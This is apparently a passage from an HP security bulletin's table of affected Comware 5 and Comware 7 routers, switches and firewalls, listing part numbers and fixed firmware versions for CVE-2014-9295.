MSR20-1X (Comware 5 - Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C RT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393), H3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C RT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C RT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) CVE-2014-9295
MSR30 (Comware 5 - Low Encryption SW) R2513L61 JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) CVE-2014-9295
MSR30-16 (Comware 5 - Low Encryption SW) R2513L61 JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321) CVE-2014-9295
MSR30-1X (Comware 5 - Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC 1XMIM 256DDR (0235A39H) CVE-2014-9295
MSR50 (Comware 5 - Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP MSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C MSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C RT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P) CVE-2014-9295
MSR50 G2 (Comware 5 - Low Encryption SW) R2513L61 JD429B HP MSR50 G2 Processor Module H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD (0231A0KL) CVE-2014-9295
12500 (Comware 5) R1828P06 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295
9500E (Comware 5) R1828P06 JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP A9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch Chassis, JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch Chassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C S9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R) CVE-2014-9295
10500 (Comware 5) R1208P10 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512 Switch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP 10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch Chassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512 TAA-compliant Switch Chassis
CVE-2014-9295
7500 (Comware 5) R6708P10 JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports, JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports, JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500 384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A HP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis, JD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506 Switch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis, JD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP 7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch Chassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis with 1 Fabric Slot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A HP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A HP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis
CVE-2014-9295
5830 (Comware 5) R1118P11 JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G Switch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A HP 5830AF-96G TAA-compliant Switch
CVE-2014-9295
5800 (Comware 5) R1809P03 JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP 5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2 Slots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP 5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot, JC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1 Interface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP 5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch, JG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G Switch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
CVE-2014-9295
5820 (Comware 5) R1809P03 JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+ TAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2 Slots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot, JG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP 5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch
CVE-2014-9295
5500 HI (Comware 5) R5501P06 JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots, JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots, JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
CVE-2014-9295
5500 EI (Comware 5) R2221P08 JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP 5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI Switch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI Switch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP 5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI TAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant Switch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch with 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with 2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2 Interface Slots
CVE-2014-9295
4800G (Comware 5) R2221P08 JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP 4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch
CVE-2014-9295
5500SI (Comware 5) R2221P08 JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP 5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP 5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI Switch with 2 Interface Slots
CVE-2014-9295
4500G (Comware 5) R2221P08 JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch
CVE-2014-9295
5120 EI (Comware 5) R2221P08 JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP 5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI Switch with 2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP 5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2 Interface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots, JG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP 5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP 5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+ EI TAA-compliant Switch with 2 Slots
CVE-2014-9295
4210G (Comware 5) R2221P08 JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE Switch
CVE-2014-9295
5120 SI (Comware 5) R1513P95 JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP 5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP 5120-24G-PoE+ (170W) SI Switch
CVE-2014-9295
3610 (Comware 5) R5319P10 JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP 3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch
CVE-2014-9295
3600V2 (Comware 5) R2110P03 JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP 3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+ v2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2 EI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI Switch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI Switch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch, JG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP 3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP 3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP 3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP 3600-48-PoE+ v2 SI Switch
CVE-2014-9295
3100V2-48 (Comware 5) R2110P03 JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch
CVE-2014-9295
3100V2 (Comware 5) R5203P11 JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP 3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI Switch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch
CVE-2014-9295
HP870 (Comware 5) R2607P35 JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN TAA-compliant Appliance
CVE-2014-9295
HP850 (Comware 5) R2607P35 JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN TAA-compliant Appliance
CVE-2014-9295
HP830 (Comware 5) R3507P35 JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port PoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN TAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN TAA-compliant
CVE-2014-9295
HP6000 (Comware 5) R2507P35 JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G Unified Wired-WLAN TAA-compliant Module
CVE-2014-9295
WX5004-EI (Comware 5) R2507P35 JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller, JD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller
CVE-2014-9295
SecBlade FW (Comware 5) R3181P05 JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module, JD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall Processing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A HP 5820 VPN Firewall Module
CVE-2014-9295
F1000-E (Comware 5) R3181P05 JD272A HP F1000-E VPN Firewall Appliance
CVE-2014-9295
F1000-A-EI (Comware 5) R3734P06 JG214A HP F1000-A-EI VPN Firewall Appliance
CVE-2014-9295
F1000-S-EI (Comware 5) R3734P06 JG213A HP F1000-S-EI VPN Firewall Appliance
CVE-2014-9295
F5000-A (Comware 5) F3210P23 JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main Processing Unit, JG216A HP F5000 Firewall Standalone Chassis
CVE-2014-9295
U200S and CS (Comware 5) F5123P31 JD273A HP U200-S UTM Appliance
CVE-2014-9295
U200A and M (Comware 5) F5123P31 JD275A HP U200-A UTM Appliance
CVE-2014-9295
F5000-C/S (Comware 5) R3811P03 JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall Appliance
CVE-2014-9295
SecBlade III (Comware 5) R3820P03 JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500 20Gbps VPN Firewall Module
CVE-2014-9295
MSR20 RU (Comware 5 Low Encryption SW) R2513L61 JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21 Router, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP MSR20-40, JF283A HP MSR20-20 Router
CVE-2014-9295
MSR20-1X RU (Comware 5 Low Encryption SW) R2513L61 JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router, JD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15 A Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A HP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP MSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router
CVE-2014-9295
MSR30 RU (Comware 5 Low Encryption SW) R2513L61 JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60 Router, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A HP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A HP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20 TAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router
CVE-2014-9295
MSR301X RU (Comware 5 Low Encryption SW) R2513L61 JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router
CVE-2014-9295
MSR316 RU (Comware 5 Low Encryption SW) R2513L61 JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router
CVE-2014-9295
MSR50 RU (Comware 5 Low Encryption SW) R2513L61 JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply
CVE-2014-9295
MSR50 EPU RU (Comware 5 Low Encryption SW) R2513L61 JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module, JD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply
CVE-2014-9295
MSR1000 RU (Comware 5 Low Encryption SW) R2513L61 JG732A HP MSR1003-8 AC Router
CVE-2014-9295
6600 RSE RU (Comware 5 Low Encryption SW) R3303P18 JC566A HP 6600 RSE-X1 Router Main Processing Unit, JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
6600 RPE RU (Comware 5 Low Encryption SW) R3303P18 JC165A) HP 6600 RPE-X1 Router Module, JG781A) HP 6600 RPE-X1 TAA-compliant Main Processing Unit
CVE-2014-9295
6602 RU (Comware 5 Low Encryption SW) R3303P18 JC176A) HP 6602 Router Chassis
CVE-2014-9295
HSR6602 RU (Comware 5 Low Encryption SW) R3303P18 JC177A HP 6608 Router, JC177B HP 6608 Router Chassis, JC178A HP 6604 Router Chassis, JC178B HP 6604 Router Chassis, JC496A HP 6616 Router Chassis, JG353A HP HSR6602-G Router, JG354A HP HSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A HP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant Router, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
HSR6800 RU (Comware 5 Low Encryption SW) R3303P18 JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing Unit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
CVE-2014-9295
SMB1910 (Comware 5) R1108 JG540A HP 1910-48 Switch, JG539A HP 1910-24-PoE+ Switch, JG538A HP 1910-24 Switch, JG537A HP 1910-8 -PoE+ Switch, JG536A HP 1910-8 Switch
CVE-2014-9295
SMB1920 (Comware 5) R1106 JG928A HP 1920-48G-PoE+ (370W) Switch, JG927A HP 1920-48G Switch, JG926A HP 1920-24G-PoE+ (370W) Switch, JG925A HP 1920-24G-PoE+ (180W) Switch, JG924A HP 1920-24G Switch, JG923A HP 1920-16G Switch, JG922A HP 1920-8G-PoE+ (180W) Switch, JG921A HP 1920-8G-PoE+ (65W) Switch, JG920A HP 1920-8G Switch
CVE-2014-9295
V1910 (Comware 5) R1513P95 JE005A HP 1910-16G Switch, JE006A HP 1910-24G Switch, JE007A HP 1910-24G-PoE (365W) Switch, JE008A HP 1910-24G-PoE(170W) Switch, JE009A HP 1910-48G Switch, JG348A HP 1910-8G Switch, JG349A HP 1910-8G-PoE+ (65W) Switch, JG350A HP 1910-8G-PoE+ (180W) Switch
CVE-2014-9295
SMB 1620 (Comware 5) R1105 JG914A HP 1620-48G Switch, JG913A HP 1620-24G Switch, JG912A HP 1620-8G Switch
CVE-2014-9295
COMWARE 7 Products
12500 (Comware 7) R7328P04 JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP 12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP FF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP FF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU, JG836A HP FlexFabric 12518E AC Switch TAA-compliant Chassis, JG834A HP FlexFabric 12508E AC Switch TAA-compliant Chassis, JG835A HP FlexFabric 12508E DC Switch TAA-compliant Chassis, JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis, JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit, JG796A HP FlexFabric 12500 48-port 10GbE SFP+ FD Module, JG790A HP FlexFabric 12500 16-port 40GbE QSFP+ FD Module, JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module, JG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module, JG788A HP FlexFabric 12500 4-port 100GbE CFP FG Module, JG786A HP FlexFabric 12500 4-port 100GbE CFP FD Module, JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant Module, JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant Module, JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant Module, JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant Module, JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module, JG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module, JG798A HP FlexFabric 12508E Fabric Module H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch (AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) CVE-2014-9295
11900 (Comware 7) R7169P01 JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing Unit, JG610A HP FF 11908 1.92Tbps Type D Fabric Module, JG611A HP FF 11900 32p 10GbE SFP+ SF Module, JG612A HP FF 11900 48p 10GbE SFP+ SF Module, JG613A HP FF 11900 4p 40GbE QSFP+ SF Module, JG614A HP FF 11900 8p 40GbE QSFP+ SF Module, JG615A HP FF 11900 24-p 1/10GBASE-T SF Module, JG616A HP FF 11900 2500W AC Power Supply, JG617A HP FF 11900 2400W DC Power Supply, JG618A HP FF 11908-V Spare Fan Assy, JG918A HP FF 11900 2p 100GbE CFP SE Module
CVE-2014-9295
10500 (Comware 7) R7150 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA Switch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA Switch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A MPU w/Comware v7 OS, JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating System, JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+ (SFP+,LC) SE Module, JH192A HP 10500 48-port Gig-TRJ45SE Module, JH193A HP 10500 16-port 10GbE SFP+ (SFP+,LC) SF Module, JH194A HP 10500 24-port 10GbE SFP+ (SFP+,LC) EC Module, JH195A HP 10500 6-port 40GbE QSFP+ EC Module, JH196A HP 10500 2-port 100GbE CFP EC Module, JH197A HP 10500 48-port 10GbE SFP+ (SFP+,LC) SG Module N/A CVE-2014-9295
12900 (Comware 7) R1112 JG619A HP FlexFabric 12910 Switch AC Chassis, JG621A HP FlexFabric 12910 Main Processing Unit, JG632A HP FlexFabric 12916 Switch AC Chassis, JG634A HP FlexFabric 12916 Main Processing Unit
CVE-2014-9295
5900 (Comware 7) R2311P06 JC772A HP 5900AF-48XG-4QSFP+ Switch, JG336A HP 5900AF-48XGT-4QSFP+ Switch, JG510A HP 5900AF-48G-4XG-2QSFP+ Switch, JG554A HP 5900AF-48XG-4QSFP+ TAA Switch, JG838A HP FF 5900CP-48XG-4QSFP+ Switch, JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant, JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch, JH038A) HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant
CVE-2014-9295
5920 (Comware 7) R2311P06 JG296A HP 5920AF-24XG Switch, JG555A HP 5920AF-24XG TAA Switch
CVE-2014-9295
MSR1000 (Comware 7) R0106P31 JG875A HP MSR1002-4 AC Router, JH060A HP MSR1003-8S AC Router
CVE-2014-9295
MSR2000 (Comware 7) R0106P31 JG411A HP MSR2003 AC Router, JG734A HP MSR2004-24 AC Router, JG735A) HP MSR2004-48 Router, JG866A HP MSR2003 TAA-compliant AC Router
CVE-2014-9295
MSR3000 (Comware 7) R0106P31 JG404A HP MSR3064 Router, JG405A HP MSR3044 Router, JG406A HP MSR3024 AC Router, JG407A HP MSR3024 DC Router, JG408A HP MSR3024 PoE Router, JG409A HP MSR3012 AC Router, JG410A HP MSR3012 DC Router, JG861A HP MSR3024 TAA-compliant AC Router
CVE-2014-9295
MSR4000 (Comware 7) R0106P31 JG402A HP MSR4080 Router Chassis, JG403A HP MSR4060 Router Chassis, JG412A HP MSR4000 MPU-100 Main Processing Unit, JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
CVE-2014-9295
